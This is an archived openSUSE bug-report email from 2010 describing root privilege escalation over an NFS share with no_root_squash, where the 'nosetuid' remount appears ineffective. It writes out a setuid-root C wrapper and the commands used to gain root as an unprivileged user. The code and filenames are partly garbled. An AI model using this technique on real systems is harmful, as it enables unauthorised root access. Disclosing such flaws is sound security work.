Mailinglist Archive: opensuse-bugs (4671 mails)

< Previous Next >
[Bug 640601] New: Priv Gain thru NFS - suspect mount nosetuid being bypassed
  • From: bugzilla_noreply@xxxxxxxxxx
  • Date: Mon, 20 Sep 2010 18:07:43 +0000
  • Message-id: <bug-640601-21960@xxxxxxxxxxxxxxxxxxxxxxxx/>

Summary: Priv Gain thru NFS - suspect mount nosetuid being
Classification: openSUSE
Product: openSUSE 11.2
Version: Final
Platform: x86-64
OS/Version: openSUSE 11.2
Status: NEW
Severity: Critical
Priority: P5 - None
Component: Security
AssignedTo: security-team@xxxxxxx
ReportedBy: p.chiu@xxxxxxxx
QAContact: qa@xxxxxxx
Found By: ---
Blocker: ---

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; (R1
1.6); SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR
3.0.30618; AskTbBLT/

We allow a software engineer user with sudo (all) access on one OpenSuse 11.2
server called ServerA.

We also mount a storage from ServerB (another OpenSuse 11.2 system) using NFS
to allow full access for some applications (ie. with no_root_squash enabled.)

mount serverB:/serverB /serverB
mount -o remount,nosetuid serverB:/serverB /serverB
mount | grep serverB
serverB:/serverB on /serverB type nfs

The user then logs on serverA.

sudo mkdir /serverB/test
cd /serverB/test
sudo vi script1.c to contain
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
setuid( 0 );
system( "./" );

return 0;

sudo cc -o script1.o script1.c
sudo chmod 4755 script1.o
sudo vi to contain
mkdir /abcd

sudo chmod 755
ls -ls
pcmc@aspre:/mnt/holly1/test> ls -ls
total 20
4 -rw-r--r-- 1 root root 158 2010-09-20 18:25 script1.c
12 -rwsr-xr-x 1 root root 11942 2010-09-20 18:27 script1.o
4 -rwxr-xr-x 1 root root 12 2010-09-20 18:26

Now, any unprivileged users on serverB will be able to obtain root privileges
by invoking the program script1.o.

For instance, logged on serverB,
su - lp
ls -lsd /abcd will show
ls: cannot access /abcd: No such file or directory
cd /serverB/test
ls -lsd /abcd
4 drwxr-xr-x 2 root lp 4096 2010-09-20 18:31 /abcd

Imagine what you can put inside!!!

It appears that the mount nosetuid option is ignored.

Reproducible: Always

Steps to Reproduce:
1. as stated above
Actual Results:
as described above

Configure bugmail:
------- You are receiving this mail because: -------
You are on the CC list for the bug.

< Previous Next >